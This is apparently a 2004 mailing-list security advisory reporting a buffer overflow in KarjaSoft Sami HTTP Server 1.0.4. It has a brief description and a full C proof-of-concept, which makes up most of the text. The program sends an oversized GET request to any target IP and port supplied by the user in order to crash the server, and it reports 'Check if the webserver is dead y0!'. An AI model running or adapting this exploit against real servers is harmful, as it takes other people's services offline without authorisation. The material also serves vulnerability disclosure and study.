<<< Date Index >>>     <<< Thread Index >>>

KarjaSoft Sami HTTP Server 1.0.4 Buffer Overflow

Can you please publish the following advisory on your site?

http://www.security-protocols.com/modules.php?name=News&file=article&sid=1746

Thanks,

----------------------------------------
badpack3t
founder
www.security-protocols.com
----------------------------------------
SP Research Labs Advisory x10
-----------------------------------

KarjaSoft Sami HTTP Server 1.0.4 Buffer Overflow
-------------------------------------------------

Vendor Home Page:
http://www.karja.com

Date Released - 2.16.2004

--------------------------------------
Product Description from the vendor:

KarjaSoft's Sami brand of servers strives to provide small and powerful 
solutions, incorporated into the Pluging Management System. Focusing on simple 
configuration and small size, the Sami products still provide the functionality 
needed for either company or personal use. Sami HTTP Server is designed to 
provide the most useful features of a web server, while still keeping the 
simplicity. With a few clicks you will be ready to share your files over the 
web! 

--------------------
Buffer Overflow

A specifically crafted HTTP GET request which contains over 4096 bytes of data 
will cause the HTTP server to crash.  It may be possible to execute arbitrary 
code.  Previous versions may also be affected by this vulnerability.  Please 
see the sploit for the HTTP GET request which causes the crash.

----------
Exploit:

Attached to this advisory is a very code which only causes the HTTP server to 
crash.  

------------------------------
Tested on WindowsXP SP1

------------------------------
Original link to the advisory:

http://www.security-protocols.com/modules.php?name=News&file=article&sid=1746

peace out,

------------------------------
badpack3t
www.security-protocols.com
------------------------------

/****************************/
   PoC to crash the server
/****************************/

http://fux0r.phathookups.com/coding/c++/sp-samihttpddos.c

/* Sami HTTP Server Version 1.0.4 
   vendor:
   http://karja.com
 
   coded and discovered by:
   badpack3t <badpack3t@xxxxxxxxxxxxxxxxxxxxxx>
   for .:sp research labs:.
   www.security-protocols.com
   2.13.2004
  
   usage: 
   sp-samihttpddos <targetip> [targetport] (default is 80)
 */

#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char exploit[] = 

/* entire request */
"\x47\x45\x54\x20\x2f\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x01\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x2e"
"\x68\x74\x6d\x6c\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\x0d\x0a\x52"
"\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6c"
"\x6f\x63\x61\x6c\x68\x6f\x73\x74\x2f\x66\x75\x78\x30\x72\x0d\x0a"
"\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70"
"\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d"
"\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x0d"
"\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65"
"\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x55\x73\x65\x72\x2d\x41\x67"
"\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x37"
"\x36\x20\x5b\x65\x6e\x5d\x20\x28\x58\x31\x31\x3b\x20\x55\x3b\x20"
"\x4c\x69\x6e\x75\x78\x20\x32\x2e\x34\x2e\x32\x2d\x32\x20\x69\x36"
"\x38\x36\x29\x0d\x0a\x56\x61\x72\x69\x61\x62\x6c\x65\x3a\x20\x72"
"\x65\x73\x75\x6c\x74\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x6c\x6f\x63"
"\x61\x6c\x68\x6f\x73\x74\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d"
"\x6c\x65\x6e\x67\x74\x68\x3a\x20\x35\x31\x33\x0d\x0a\x41\x63\x63"
"\x65\x70\x74\x3a\x20\x69\x6d\x61\x67\x65\x2f\x67\x69\x66\x2c\x20"
"\x69\x6d\x61\x67\x65\x2f\x78\x2d\x78\x62\x69\x74\x6d\x61\x70\x2c"
"\x20\x69\x6d\x61\x67\x65\x2f\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61"
"\x67\x65\x2f\x70\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67\x65\x2f"
"\x70\x6e\x67\x0d\x0a\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f"
"\x64\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x0d\x0a\x41\x63\x63\x65"
"\x70\x74\x2d\x43\x68\x61\x72\x73\x65\x74\x3a\x20\x69\x73\x6f\x2d"
"\x38\x38\x35\x39\x2d\x31\x2c\x2a\x2c\x75\x74\x66\x2d\x38\x0d\x0a"
"\x0d\x0a\x77\x68\x61\x74\x79\x6f\x75\x74\x79\x70\x65\x64\x3d\x3f"
"\x0d\x0a";

int main(int argc, char *argv[])
{
        WSADATA wsaData;
        WORD wVersionRequested;
        struct hostent  *pTarget;
        struct sockaddr_in      sock;
        char *target;
        int port,bufsize;
        SOCKET mysocket;
        
        if (argc < 2)
        {
                printf("Sami HTTP Server Version 1.0.4 DoS by badpack3t\r\n 
<badpack3t@xxxxxxxxxxxxxxxxxxxxxx>\r\n\r\n", argv[0]);
                printf("Usage:\r\n %s <targetip> [targetport] (default is 
80)\r\n\r\n", argv[0]);
                printf("www.security-protocols.com\r\n\r\n", argv[0]);
                exit(1);
        }

        wVersionRequested = MAKEWORD(1, 1);
        if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

        target = argv[1];
        port = 80;

        if (argc >= 3) port = atoi(argv[2]);
        bufsize = 1024;
        if (argc >= 4) bufsize = atoi(argv[3]);

        mysocket = socket(AF_INET, SOCK_STREAM, 0);
        if(mysocket==INVALID_SOCKET)
        {       
                printf("Socket error!\r\n");
                exit(1);
        }

        printf("Resolving Hostnames...\n");
        if ((pTarget = gethostbyname(target)) == NULL)
        {
                printf("Resolve of %s failed\n", argv[1]);
                exit(1);
        }

        memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
        sock.sin_family = AF_INET;
        sock.sin_port = htons((USHORT)port);

        printf("Connecting...\n");
        if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
        {
                printf("Couldn't connect to host.\n");
                exit(1);
        }

        printf("Connected!...\n");
        printf("Sending Payload...\n");
        if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
        {
                printf("Error Sending the Exploit Payload\r\n");
                closesocket(mysocket);
                exit(1);
        }

        printf("Payload has been sent! Check if the webserver is dead y0!\r\n");
        closesocket(mysocket);
        WSACleanup();
        return 0;
}